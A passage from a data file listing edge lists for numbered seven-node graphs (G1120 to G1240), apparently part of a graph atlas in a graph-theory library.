[1, 4],
[1, 5],
[1, 6],
[1, 7],
[2, 5],
[3, 6],
[3, 7],
[4, 6],
[4, 7],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1120',
7,
[[4, 5],
[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[1, 2],
[6, 2],
[1, 5],
[2, 5],
[6, 4],
[3, 6],
[7, 5],
[1, 7]]],
['edgelist',
'G1121',
7,
[[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[4, 5],
[6, 4],
[3, 6],
[2, 1],
[5, 2],
[7, 2],
[6, 2],
[3, 7],
[1, 5]]],
['edgelist',
'G1122',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 5],
[1, 6],
[1, 7],
[2, 7],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[4, 7],
[5, 6],
[5, 7]]],
['edgelist',
'G1123',
7,
[[3, 4],
[5, 3],
[7, 4],
[5, 1],
[7, 1],
[4, 5],
[4, 2],
[6, 5],
[6, 1],
[1, 4],
[2, 6],
[6, 4],
[7, 5],
[7, 2]]],
['edgelist',
'G1124',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 5],
[2, 3],
[2, 4],
[2, 5],
[3, 4],
[3, 5],
[4, 5],
[6, 4],
[7, 6],
[5, 7],
[6, 5]]],
['edgelist',
'G1125',
7,
[[4, 2],
[2, 5],
[3, 4],
[4, 5],
[1, 5],
[2, 6],
[1, 2],
[1, 3],
[3, 6],
[6, 4],
[5, 6],
[2, 3],
[7, 3],
[6, 7]]],
['edgelist',
'G1126',
7,
[[1, 4],
[1, 7],
[2, 5],
[2, 6],
[2, 7],
[3, 4],
[3, 5],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1127',
7,
[[1, 4],
[1, 7],
[2, 3],
[2, 5],
[2, 6],
[3, 5],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[4, 7],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1128',
7,
[[1, 6],
[1, 7],
[2, 5],
[2, 6],
[2, 7],
[3, 4],
[3, 5],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[4, 7],
[5, 6],
[5, 7]]],
['edgelist',
'G1129',
7,
[[1, 2],
[1, 7],
[2, 5],
[2, 6],
[3, 4],
[3, 5],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[4, 7],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1130',
7,
[[1, 6],
[1, 7],
[2, 3],
[2, 4],
[2, 5],
[3, 5],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[4, 7],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1131',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 5],
[2, 3],
[2, 4],
[2, 5],
[3, 4],
[3, 5],
[5, 7],
[6, 3],
[2, 6],
[1, 6],
[7, 4]]],
['edgelist',
'G1132',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[6, 1],
[6, 2],
[6, 3],
[6, 4],
[6, 5],
[5, 3],
[4, 1],
[7, 2],
[6, 7]]],
['edgelist',
'G1133',
7,
[[1, 5],
[1, 7],
[2, 3],
[2, 4],
[2, 6],
[2, 7],
[3, 4],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1134',
7,
[[1, 5],
[1, 7],
[2, 4],
[2, 5],
[2, 6],
[2, 7],
[3, 4],
[3, 5],
[3, 6],
[3, 7],
[4, 6],
[4, 7],
[5, 6],
[6, 7]]],
['edgelist',
'G1135',
7,
[[1, 6],
[1, 7],
[2, 4],
[2, 5],
[2, 6],
[2, 7],
[3, 4],
[3, 5],
[3, 6],
[3, 7],
[4, 5],
[4, 7],
[5, 6],
[6, 7]]],
['edgelist',
'G1136',
7,
[[3, 4],
[1, 3],
[4, 1],
[5, 4],
[2, 5],
[6, 2],
[2, 3],
[6, 3],
[5, 1],
[4, 2],
[6, 1],
[7, 6],
[7, 5],
[1, 2]]],
['edgelist',
'G1137',
7,
[[3, 4],
[1, 3],
[4, 1],
[5, 4],
[2, 5],
[6, 2],
[5, 6],
[6, 3],
[7, 1],
[7, 2],
[6, 1],
[2, 3],
[4, 2],
[5, 1]]],
['edgelist',
'G1138',
7,
[[6, 7],
[1, 6],
[7, 1],
[5, 7],
[6, 5],
[2, 6],
[7, 2],
[4, 7],
[6, 4],
[3, 6],
[7, 3],
[2, 1],
[3, 2],
[4, 5]]],
['edgelist',
'G1139',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 5],
[1, 6],
[1, 7],
[2, 6],
[2, 7],
[3, 6],
[3, 7],
[4, 5],
[4, 7],
[5, 6],
[6, 7]]],
['edgelist',
'G1140',
7,
[[1, 2],
[3, 1],
[3, 4],
[4, 5],
[1, 5],
[1, 6],
[7, 2],
[5, 7],
[7, 6],
[3, 7],
[4, 2],
[6, 4],
[7, 1],
[4, 7]]],
['edgelist',
'G1141',
7,
[[4, 2],
[5, 3],
[5, 6],
[5, 1],
[2, 5],
[1, 4],
[6, 1],
[6, 3],
[7, 2],
[4, 7],
[7, 1],
[6, 7],
[7, 3],
[5, 7]]],
['edgelist',
'G1142',
7,
[[1, 5],
[4, 1],
[3, 4],
[5, 3],
[2, 5],
[4, 2],
[2, 1],
[3, 2],
[6, 5],
[2, 6],
[7, 2],
[4, 7],
[1, 6],
[7, 1]]],
['edgelist',
'G1143',
7,
[[4, 5],
[5, 3],
[2, 6],
[5, 1],
[2, 5],
[6, 4],
[4, 1],
[6, 3],
[7, 5],
[1, 7],
[4, 7],
[3, 7],
[6, 7],
[2, 7]]],
['edgelist',
'G1144',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 5],
[1, 6],
[1, 7],
[2, 5],
[2, 6],
[3, 4],
[3, 7],
[4, 7],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1145',
7,
[[3, 4],
[5, 3],
[7, 4],
[5, 1],
[5, 6],
[4, 5],
[4, 2],
[6, 3],
[2, 7],
[6, 7],
[7, 1],
[6, 4],
[7, 5],
[1, 2]]],
['edgelist',
'G1146',
7,
[[1, 5],
[1, 6],
[1, 7],
[2, 4],
[2, 6],
[2, 7],
[3, 4],
[3, 5],
[3, 7],
[4, 5],
[4, 6],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1147',
7,
[[1, 5],
[1, 6],
[1, 7],
[2, 3],
[2, 6],
[2, 7],
[3, 4],
[3, 5],
[4, 5],
[4, 6],
[4, 7],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1148',
7,
[[3, 4],
[5, 3],
[7, 4],
[5, 1],
[2, 5],
[7, 1],
[4, 2],
[6, 3],
[5, 6],
[6, 7],
[2, 6],
[6, 4],
[7, 5],
[4, 1]]],
['edgelist',
'G1149',
7,
[[4, 2],
[5, 3],
[1, 4],
[5, 1],
[2, 5],
[6, 4],
[6, 1],
[6, 3],
[7, 5],
[2, 7],
[7, 4],
[1, 7],
[7, 6],
[3, 7]]],
['edgelist',
'G1150',
7,
[[1, 2],
[5, 3],
[4, 1],
[5, 1],
[5, 6],
[6, 4],
[2, 4],
[6, 3],
[7, 5],
[3, 7],
[7, 6],
[4, 7],
[7, 2],
[1, 7]]],
['edgelist',
'G1151',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 5],
[1, 6],
[1, 7],
[2, 3],
[2, 7],
[3, 6],
[4, 5],
[4, 6],
[4, 7],
[5, 6],
[5, 7]]],
['edgelist',
'G1152',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 5],
[1, 6],
[1, 7],
[2, 6],
[2, 7],
[3, 4],
[3, 5],
[4, 6],
[4, 7],
[5, 6],
[5, 7]]],
['edgelist',
'G1153',
7,
[[3, 4],
[5, 3],
[7, 4],
[5, 1],
[2, 5],
[7, 2],
[4, 2],
[6, 3],
[6, 1],
[6, 7],
[5, 6],
[6, 4],
[7, 1],
[4, 1]]],
['edgelist',
'G1154',
7,
[[3, 4],
[5, 3],
[4, 1],
[5, 1],
[5, 6],
[4, 5],
[4, 2],
[6, 3],
[1, 2],
[6, 7],
[7, 1],
[6, 4],
[7, 5],
[2, 7]]],
['edgelist',
'G1155',
7,
[[1, 5],
[1, 6],
[1, 7],
[2, 4],
[2, 6],
[2, 7],
[3, 4],
[3, 5],
[3, 6],
[3, 7],
[4, 5],
[4, 7],
[5, 6],
[6, 7]]],
['edgelist',
'G1156',
7,
[[1, 4],
[1, 5],
[1, 7],
[2, 3],
[2, 5],
[2, 6],
[3, 4],
[3, 6],
[3, 7],
[4, 6],
[4, 7],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1157',
7,
[[1, 5],
[1, 6],
[1, 7],
[2, 3],
[2, 4],
[2, 7],
[3, 5],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[4, 7],
[5, 6],
[6, 7]]],
['edgelist',
'G1158',
7,
[[1, 2],
[1, 6],
[1, 7],
[2, 5],
[2, 7],
[3, 4],
[3, 5],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[4, 7],
[5, 6],
[6, 7]]],
['edgelist',
'G1159',
7,
[[1, 2],
[1, 5],
[1, 7],
[2, 4],
[2, 6],
[3, 4],
[3, 5],
[3, 6],
[3, 7],
[4, 6],
[4, 7],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1160',
7,
[[3, 4],
[5, 3],
[7, 4],
[5, 1],
[2, 5],
[5, 6],
[4, 2],
[6, 3],
[6, 1],
[7, 2],
[1, 7],
[6, 4],
[7, 5],
[4, 1]]],
['edgelist',
'G1161',
7,
[[1, 2],
[1, 6],
[1, 7],
[2, 4],
[2, 5],
[3, 4],
[3, 5],
[3, 6],
[3, 7],
[4, 6],
[4, 7],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1162',
7,
[[1, 5],
[1, 6],
[1, 7],
[2, 3],
[2, 4],
[2, 5],
[3, 4],
[3, 6],
[3, 7],
[4, 6],
[4, 7],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1163',
7,
[[1, 5],
[1, 6],
[1, 7],
[2, 5],
[2, 6],
[2, 7],
[3, 4],
[3, 5],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[4, 7],
[6, 7]]],
['edgelist',
'G1164',
7,
[[3, 4],
[5, 3],
[7, 4],
[5, 1],
[5, 6],
[4, 6],
[4, 2],
[6, 3],
[4, 1],
[2, 5],
[7, 1],
[2, 7],
[7, 5],
[1, 2]]],
['edgelist',
'G1165',
7,
[[1, 5],
[1, 6],
[1, 7],
[2, 4],
[2, 5],
[2, 6],
[2, 7],
[3, 4],
[3, 5],
[3, 6],
[3, 7],
[4, 6],
[4, 7],
[5, 7]]],
['edgelist',
'G1166',
7,
[[1, 5],
[1, 6],
[1, 7],
[2, 3],
[2, 4],
[2, 6],
[2, 7],
[3, 4],
[3, 6],
[3, 7],
[4, 5],
[4, 7],
[5, 6],
[5, 7]]],
['edgelist',
'G1167',
7,
[[1, 5],
[1, 6],
[1, 7],
[2, 3],
[2, 4],
[2, 6],
[2, 7],
[3, 4],
[3, 5],
[3, 7],
[4, 5],
[4, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1168',
7,
[[1, 4],
[1, 5],
[1, 6],
[2, 3],
[2, 5],
[2, 6],
[2, 7],
[3, 4],
[3, 6],
[3, 7],
[4, 5],
[4, 7],
[5, 7],
[6, 7]]],
['edgelist',
'G1169',
7,
[[1, 4],
[1, 5],
[1, 6],
[2, 4],
[2, 5],
[2, 6],
[2, 7],
[3, 4],
[3, 5],
[3, 6],
[3, 7],
[4, 7],
[5, 7],
[6, 7]]],
['edgelist',
'G1170',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[6, 7],
[1, 7],
[1, 3],
[6, 1],
[4, 6],
[2, 4],
[7, 2],
[5, 7],
[3, 5]]],
['edgelist',
'G1171',
7,
[[1, 4],
[1, 5],
[1, 6],
[1, 7],
[2, 4],
[2, 5],
[2, 6],
[2, 7],
[3, 4],
[3, 5],
[3, 6],
[3, 7],
[4, 7],
[5, 6]]],
['edgelist',
'G1172',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 5],
[1, 6],
[2, 3],
[2, 4],
[2, 5],
[2, 6],
[3, 4],
[3, 5],
[3, 6],
[4, 5],
[4, 6],
[5, 6]]],
['edgelist',
'G1173',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[3, 5],
[6, 3],
[2, 6],
[2, 5],
[2, 4],
[3, 1],
[5, 1],
[6, 4],
[2, 7]]],
['edgelist',
'G1174',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[3, 5],
[6, 3],
[2, 6],
[2, 5],
[2, 4],
[3, 1],
[5, 1],
[6, 4],
[1, 7]]],
['edgelist',
'G1175',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 5],
[1, 6],
[1, 7],
[2, 3],
[2, 4],
[2, 5],
[2, 6],
[2, 7],
[4, 5],
[4, 6],
[4, 7],
[6, 7]]],
['edgelist',
'G1176',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 5],
[1, 6],
[1, 7],
[2, 6],
[2, 7],
[3, 5],
[4, 5],
[4, 6],
[4, 7],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1177',
7,
[[4, 5],
[5, 6],
[1, 4],
[1, 5],
[1, 6],
[1, 7],
[4, 7],
[5, 7],
[6, 7],
[2, 6],
[4, 6],
[3, 4],
[3, 5],
[2, 7],
[1, 2]]],
['edgelist',
'G1178',
7,
[[4, 5],
[5, 6],
[1, 4],
[1, 5],
[1, 6],
[1, 7],
[4, 7],
[2, 4],
[2, 5],
[2, 6],
[4, 6],
[3, 4],
[3, 5],
[7, 2],
[5, 7]]],
['edgelist',
'G1179',
7,
[[1, 2],
[2, 3],
[3, 4],
[1, 4],
[5, 1],
[5, 2],
[5, 3],
[5, 4],
[6, 2],
[1, 6],
[6, 3],
[4, 6],
[5, 6],
[7, 2],
[6, 7]]],
['edgelist',
'G1180',
7,
[[5, 4],
[5, 6],
[6, 4],
[1, 2],
[1, 6],
[1, 4],
[3, 5],
[2, 6],
[2, 4],
[7, 6],
[4, 7],
[7, 1],
[2, 7],
[7, 3],
[5, 7]]],
['edgelist',
'G1181',
7,
[[4, 5],
[5, 6],
[6, 7],
[1, 5],
[1, 6],
[1, 7],
[4, 7],
[2, 4],
[5, 7],
[2, 6],
[4, 6],
[3, 4],
[3, 5],
[2, 7],
[1, 2]]],
['edgelist',
'G1182',
7,
[[1, 3],
[1, 7],
[2, 4],
[2, 5],
[2, 6],
[2, 7],
[3, 4],
[3, 5],
[3, 6],
[4, 5],
[4, 6],
[4, 7],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1183',
7,
[[7, 2],
[5, 6],
[1, 4],
[1, 5],
[1, 6],
[1, 7],
[4, 7],
[2, 4],
[2, 5],
[2, 6],
[4, 6],
[3, 4],
[3, 5],
[6, 7],
[5, 7]]],
['edgelist',
'G1184',
7,
[[4, 5],
[5, 6],
[1, 4],
[1, 5],
[1, 6],
[5, 7],
[4, 7],
[2, 4],
[2, 5],
[2, 6],
[4, 6],
[3, 4],
[3, 5],
[6, 7],
[6, 3]]],
['edgelist',
'G1185',
7,
[[4, 5],
[5, 6],
[1, 4],
[1, 5],
[7, 1],
[5, 7],
[4, 7],
[2, 4],
[2, 5],
[2, 6],
[4, 6],
[3, 4],
[3, 5],
[6, 7],
[6, 3]]],
['edgelist',
'G1186',
7,
[[1, 2],
[2, 3],
[1, 3],
[4, 1],
[2, 4],
[3, 4],
[6, 2],
[4, 6],
[5, 4],
[3, 5],
[7, 3],
[4, 7],
[7, 2],
[1, 6],
[5, 1]]],
['edgelist',
'G1187',
7,
[[1, 2],
[3, 1],
[4, 3],
[5, 4],
[2, 5],
[4, 2],
[5, 3],
[1, 5],
[4, 1],
[7, 4],
[5, 7],
[6, 5],
[4, 6],
[7, 3],
[6, 2]]],
['edgelist',
'G1188',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 5],
[2, 3],
[2, 4],
[2, 5],
[3, 4],
[3, 5],
[4, 5],
[6, 4],
[5, 6],
[7, 5],
[6, 7],
[7, 4]]],
['edgelist',
'G1189',
7,
[[1, 2],
[2, 3],
[3, 4],
[1, 4],
[5, 1],
[5, 4],
[5, 3],
[7, 2],
[3, 7],
[6, 3],
[5, 6],
[7, 5],
[1, 7],
[7, 6],
[4, 7]]],
['edgelist',
'G1190',
7,
[[1, 2],
[6, 4],
[2, 4],
[1, 5],
[4, 1],
[5, 4],
[3, 5],
[6, 3],
[5, 6],
[7, 5],
[3, 7],
[7, 6],
[4, 7],
[7, 2],
[1, 7]]],
['edgelist',
'G1191',
7,
[[6, 3],
[5, 6],
[4, 2],
[1, 5],
[1, 6],
[1, 4],
[3, 5],
[2, 6],
[2, 5],
[7, 4],
[2, 7],
[7, 1],
[6, 7],
[7, 3],
[5, 7]]],
['edgelist',
'G1192',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[1, 4],
[3, 1],
[4, 2],
[7, 5],
[6, 7],
[7, 4],
[1, 7],
[7, 3],
[2, 7]]],
['edgelist',
'G1193',
7,
[[6, 3],
[4, 1],
[6, 4],
[1, 5],
[1, 6],
[5, 4],
[3, 5],
[2, 6],
[2, 5],
[7, 5],
[3, 7],
[7, 1],
[6, 7],
[7, 4],
[2, 7]]],
['edgelist',
'G1194',
7,
[[1, 5],
[1, 6],
[1, 7],
[2, 3],
[2, 4],
[2, 7],
[3, 4],
[3, 5],
[3, 6],
[4, 5],
[4, 6],
[4, 7],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1195',
7,
[[7, 2],
[5, 6],
[1, 4],
[1, 5],
[1, 6],
[5, 7],
[4, 7],
[2, 4],
[2, 5],
[1, 7],
[4, 6],
[3, 4],
[3, 5],
[6, 7],
[6, 3]]],
['edgelist',
'G1196',
7,
[[4, 5],
[1, 2],
[1, 4],
[1, 5],
[1, 6],
[5, 7],
[4, 7],
[2, 4],
[2, 5],
[7, 1],
[2, 7],
[3, 4],
[3, 5],
[6, 7],
[6, 3]]],
['edgelist',
'G1197',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 5],
[1, 6],
[1, 7],
[2, 6],
[2, 7],
[3, 5],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[4, 7],
[5, 7]]],
['edgelist',
'G1198',
7,
[[6, 3],
[5, 6],
[6, 4],
[1, 5],
[1, 2],
[2, 4],
[3, 5],
[4, 1],
[2, 5],
[7, 5],
[2, 7],
[7, 1],
[4, 7],
[7, 3],
[6, 7]]],
['edgelist',
'G1199',
7,
[[6, 1],
[5, 4],
[6, 4],
[6, 3],
[1, 2],
[2, 4],
[3, 5],
[4, 1],
[2, 5],
[7, 3],
[6, 7],
[7, 5],
[4, 7],
[7, 1],
[2, 7]]],
['edgelist',
'G1200',
7,
[[4, 5],
[5, 6],
[1, 4],
[5, 7],
[1, 2],
[2, 7],
[4, 7],
[2, 4],
[2, 5],
[7, 1],
[1, 6],
[3, 4],
[3, 5],
[6, 7],
[6, 3]]],
['edgelist',
'G1201',
7,
[[1, 3],
[1, 4],
[1, 7],
[2, 4],
[2, 5],
[2, 6],
[2, 7],
[3, 5],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1202',
7,
[[1, 5],
[1, 6],
[1, 7],
[2, 4],
[2, 5],
[2, 6],
[2, 7],
[3, 4],
[3, 5],
[3, 6],
[3, 7],
[4, 6],
[4, 7],
[5, 6],
[5, 7]]],
['edgelist',
'G1203',
7,
[[4, 5],
[6, 1],
[1, 4],
[1, 5],
[5, 7],
[2, 7],
[4, 7],
[2, 4],
[2, 5],
[7, 1],
[2, 6],
[3, 4],
[3, 5],
[6, 7],
[6, 3]]],
['edgelist',
'G1204',
7,
[[7, 5],
[6, 3],
[1, 4],
[1, 5],
[3, 5],
[2, 7],
[4, 7],
[2, 4],
[2, 5],
[7, 1],
[4, 6],
[3, 4],
[1, 2],
[6, 7],
[5, 6]]],
['edgelist',
'G1205',
7,
[[1, 5],
[1, 6],
[1, 7],
[2, 3],
[2, 4],
[2, 6],
[2, 7],
[3, 4],
[3, 5],
[3, 7],
[4, 5],
[4, 6],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1206',
7,
[[1, 2],
[1, 3],
[1, 4],
[2, 5],
[2, 6],
[2, 7],
[3, 5],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[4, 7],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1207',
7,
[[3, 4],
[1, 3],
[4, 1],
[5, 4],
[2, 5],
[6, 2],
[5, 6],
[2, 1],
[6, 3],
[7, 3],
[6, 7],
[7, 2],
[1, 7],
[7, 5],
[4, 7]]],
['edgelist',
'G1208',
7,
[[4, 1],
[4, 6],
[4, 5],
[3, 1],
[3, 6],
[3, 5],
[2, 5],
[2, 6],
[2, 1],
[7, 1],
[2, 7],
[7, 6],
[4, 7],
[7, 5],
[3, 7]]],
['edgelist',
'G1209',
7,
[[1, 4],
[1, 5],
[1, 6],
[1, 7],
[2, 3],
[2, 5],
[2, 6],
[2, 7],
[3, 4],
[3, 6],
[3, 7],
[4, 5],
[4, 7],
[5, 6],
[6, 7]]],
['edgelist',
'G1210',
7,
[[4, 5],
[7, 3],
[1, 4],
[1, 5],
[6, 1],
[2, 7],
[4, 7],
[2, 4],
[2, 5],
[7, 1],
[5, 6],
[3, 4],
[3, 5],
[6, 2],
[6, 3]]],
['edgelist',
'G1211',
7,
[[4, 5],
[7, 3],
[1, 4],
[1, 5],
[6, 1],
[6, 7],
[4, 7],
[2, 4],
[2, 5],
[1, 2],
[5, 7],
[3, 4],
[3, 5],
[6, 2],
[6, 3]]],
['edgelist',
'G1212',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[7, 3],
[2, 7],
[7, 1],
[5, 7],
[6, 5],
[1, 6],
[4, 6],
[7, 4],
[6, 3],
[2, 6]]],
['edgelist',
'G1213',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 5],
[1, 6],
[2, 3],
[2, 4],
[2, 5],
[2, 6],
[3, 4],
[3, 5],
[3, 6],
[4, 5],
[4, 6],
[5, 6],
[3, 7]]],
['edgelist',
'G1214',
7,
[[4, 1],
[5, 2],
[5, 4],
[2, 4],
[5, 1],
[3, 6],
[7, 3],
[6, 7],
[2, 6],
[5, 6],
[4, 6],
[1, 6],
[1, 7],
[4, 7],
[5, 7],
[7, 2]]],
['edgelist',
'G1215',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 5],
[1, 6],
[1, 7],
[2, 7],
[3, 4],
[3, 5],
[3, 6],
[4, 5],
[4, 6],
[4, 7],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1216',
7,
[[1, 6],
[1, 7],
[2, 3],
[2, 4],
[2, 5],
[2, 6],
[2, 7],
[3, 4],
[3, 5],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[4, 7],
[5, 6],
[5, 7]]],
['edgelist',
'G1217',
7,
[[4, 5],
[6, 2],
[1, 4],
[1, 5],
[6, 1],
[5, 7],
[4, 7],
[2, 4],
[2, 5],
[7, 1],
[4, 6],
[3, 4],
[3, 5],
[6, 7],
[5, 6],
[3, 6]]],
['edgelist',
'G1218',
7,
[[3, 5],
[4, 2],
[4, 1],
[5, 4],
[5, 1],
[6, 3],
[5, 6],
[6, 1],
[4, 6],
[6, 2],
[7, 6],
[2, 7],
[4, 7],
[7, 1],
[5, 7],
[7, 3]]],
['edgelist',
'G1219',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 5],
[1, 6],
[1, 7],
[2, 6],
[2, 7],
[3, 4],
[3, 5],
[4, 5],
[4, 6],
[4, 7],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1220',
7,
[[3, 5],
[5, 2],
[4, 1],
[4, 2],
[5, 1],
[6, 3],
[5, 6],
[6, 1],
[4, 6],
[7, 6],
[2, 6],
[7, 2],
[4, 7],
[5, 7],
[7, 3],
[7, 1]]],
['edgelist',
'G1221',
7,
[[1, 2],
[1, 4],
[1, 6],
[1, 7],
[2, 4],
[2, 6],
[2, 7],
[3, 5],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[4, 7],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1222',
7,
[[3, 6],
[1, 2],
[5, 6],
[2, 4],
[6, 1],
[5, 4],
[6, 4],
[3, 5],
[2, 5],
[4, 1],
[7, 4],
[3, 7],
[7, 5],
[6, 7],
[7, 2],
[1, 7]]],
['edgelist',
'G1223',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 5],
[1, 6],
[1, 7],
[2, 4],
[2, 7],
[3, 5],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1224',
7,
[[3, 6],
[6, 2],
[4, 2],
[1, 5],
[6, 1],
[5, 4],
[6, 4],
[3, 5],
[2, 5],
[4, 1],
[7, 3],
[5, 7],
[6, 7],
[7, 2],
[1, 7],
[4, 7]]],
['edgelist',
'G1225',
7,
[[2, 7],
[1, 2],
[1, 4],
[1, 5],
[6, 1],
[5, 7],
[4, 7],
[2, 4],
[2, 5],
[7, 1],
[4, 6],
[3, 4],
[3, 5],
[6, 7],
[5, 6],
[3, 6]]],
['edgelist',
'G1226',
7,
[[4, 5],
[6, 2],
[1, 4],
[1, 5],
[6, 1],
[5, 7],
[4, 7],
[2, 4],
[2, 5],
[7, 1],
[2, 7],
[3, 4],
[3, 5],
[6, 7],
[1, 2],
[3, 6]]],
['edgelist',
'G1227',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 5],
[1, 6],
[1, 7],
[2, 3],
[2, 4],
[2, 5],
[2, 6],
[2, 7],
[3, 6],
[3, 7],
[4, 5],
[4, 7],
[5, 6]]],
['edgelist',
'G1228',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 5],
[1, 6],
[1, 7],
[2, 5],
[2, 6],
[2, 7],
[3, 4],
[3, 6],
[3, 7],
[4, 5],
[4, 7],
[5, 6],
[6, 7]]],
['edgelist',
'G1229',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 5],
[1, 6],
[1, 7],
[2, 5],
[2, 6],
[2, 7],
[3, 5],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[4, 7],
[6, 7]]],
['edgelist',
'G1230',
7,
[[3, 6],
[6, 2],
[4, 6],
[1, 5],
[1, 2],
[5, 4],
[4, 3],
[3, 5],
[2, 5],
[1, 6],
[7, 5],
[3, 7],
[7, 4],
[6, 7],
[7, 2],
[1, 7]]],
['edgelist',
'G1231',
7,
[[6, 7],
[6, 2],
[1, 4],
[1, 5],
[1, 2],
[5, 7],
[4, 7],
[2, 4],
[2, 5],
[7, 1],
[4, 6],
[3, 4],
[3, 5],
[7, 3],
[5, 6],
[3, 6]]],
['edgelist',
'G1232',
7,
[[4, 5],
[6, 2],
[1, 4],
[1, 5],
[1, 2],
[5, 7],
[4, 7],
[2, 4],
[2, 5],
[7, 1],
[6, 1],
[3, 4],
[3, 5],
[7, 3],
[7, 6],
[3, 6]]],
['edgelist',
'G1233',
7,
[[6, 1],
[6, 2],
[1, 4],
[1, 5],
[7, 2],
[5, 7],
[4, 7],
[2, 4],
[2, 5],
[7, 1],
[4, 6],
[3, 4],
[3, 5],
[7, 3],
[5, 6],
[3, 6]]],
['edgelist',
'G1234',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 5],
[1, 6],
[2, 3],
[2, 4],
[2, 5],
[2, 6],
[3, 4],
[3, 5],
[3, 6],
[4, 5],
[4, 6],
[5, 6],
[7, 3],
[2, 7]]],
['edgelist',
'G1235',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 5],
[1, 6],
[1, 7],
[2, 3],
[2, 4],
[2, 5],
[2, 6],
[2, 7],
[3, 4],
[3, 5],
[3, 6],
[3, 7],
[5, 6],
[5, 7]]],
['edgelist',
'G1236',
7,
[[5, 1],
[5, 4],
[1, 2],
[4, 1],
[3, 5],
[4, 2],
[6, 4],
[5, 6],
[6, 3],
[7, 6],
[6, 1],
[2, 6],
[7, 2],
[1, 7],
[7, 5],
[3, 7],
[4, 7]]],
['edgelist',
'G1237',
7,
[[1, 2],
[6, 2],
[6, 4],
[1, 5],
[6, 1],
[5, 4],
[4, 2],
[3, 6],
[2, 5],
[4, 1],
[3, 5],
[7, 3],
[6, 7],
[7, 4],
[2, 7],
[7, 1],
[5, 7]]],
['edgelist',
'G1238',
7,
[[4, 5],
[6, 2],
[1, 4],
[1, 5],
[5, 6],
[5, 7],
[4, 7],
[2, 4],
[2, 5],
[1, 2],
[4, 6],
[3, 4],
[3, 5],
[3, 6],
[6, 1],
[6, 7],
[7, 3]]],
['edgelist',
'G1239',
7,
[[4, 3],
[5, 2],
[1, 2],
[4, 1],
[3, 5],
[5, 4],
[6, 2],
[5, 6],
[6, 3],
[1, 6],
[6, 4],
[7, 6],
[3, 7],
[7, 4],
[1, 7],
[2, 7],
[5, 7]]],
['edgelist',
'G1240',
7,
[[4, 3],
[5, 2],
[5, 1],
[4, 1],
[3, 5],
[4, 2],
[6, 3],
[5, 6],
[6, 1],
[4, 6],
[6, 2],
[7, 6],
[3, 7],
[7, 1],
[4, 7],
[7, 5],
[2, 7]]],
['edgelist',
'G1241',
7,
[[4, 3],
